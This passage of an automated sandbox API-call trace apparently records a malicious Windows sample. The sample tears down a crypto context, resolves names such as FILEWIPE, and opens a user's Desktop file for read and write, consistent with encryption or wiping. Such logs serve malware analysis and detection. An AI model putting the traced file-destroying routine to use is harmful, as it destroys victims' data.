lpMsg=0x87ee3c) returned 0 [0164.592] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.592] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.592] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0164.592] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.592] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0164.592] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.592] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.592] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.592] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.592] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0164.592] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.592] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.592] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.596] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.596] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.596] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.599] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.599] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.599] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0164.599] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0164.599] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.599] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0164.600] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.600] CryptDestroyKey (hKey=0x90af98) returned 1 [0164.602] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0164.602] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0164.602] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0164.602] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0164.604] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0164.604] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0164.604] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0164.604] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0164.604] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.604] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0164.604] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0164.604] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0164.604] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0164.604] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0164.604] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.604] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0164.605] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0164.605] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.605] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.605] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.605] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0164.605] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.605] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.605] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0164.605] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0164.605] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0164.605] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.605] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0164.605] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.606] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.606] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0164.606] FreeLibrary (hLibModule=0x74f20000) returned 1 [0164.606] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.606] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.606] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.606] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.607] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.610] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.610] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0164.610] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.610] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.610] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da0eaa0, ftCreationTime.dwHighDateTime=0x1d5d9bd, ftLastAccessTime.dwLowDateTime=0x47dd5440, ftLastAccessTime.dwHighDateTime=0x1d5e458, ftLastWriteTime.dwLowDateTime=0x47dd5440, ftLastWriteTime.dwHighDateTime=0x1d5e458, nFileSizeHigh=0x0, nFileSizeLow=0x8a16, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="JLQ6tYmOaaqJ7B5t.gif", cAlternateFileName="JLQ6TY~1.GIF")) returned 0x90ae18 [0164.611] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0164.611] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.611] CharLowerBuffW (in: lpsz="byte[35350]", cchLength=0xb | out: lpsz="byte[35350]") returned 0xb [0164.612] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.612] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0164.612] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.612] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0164.612] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0164.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0164.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0164.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0164.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2658 [0164.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2658, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0164.612] FreeLibrary (hLibModule=0x75c90000) returned 1 [0164.612] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0164.613] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.613] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0164.613] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0164.613] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0164.613] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.613] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.613] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.613] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.614] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.614] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.614] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.614] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.614] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.614] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.614] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.614] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.614] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.614] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0164.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0164.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.615] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0164.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0164.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0164.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0164.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0164.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.615] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0164.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0164.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0164.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0164.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0164.615] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0164.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0164.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0164.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba000 [0164.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba000, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0164.615] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\jlq6tymoaaqj7b5t.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0164.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0164.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0164.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 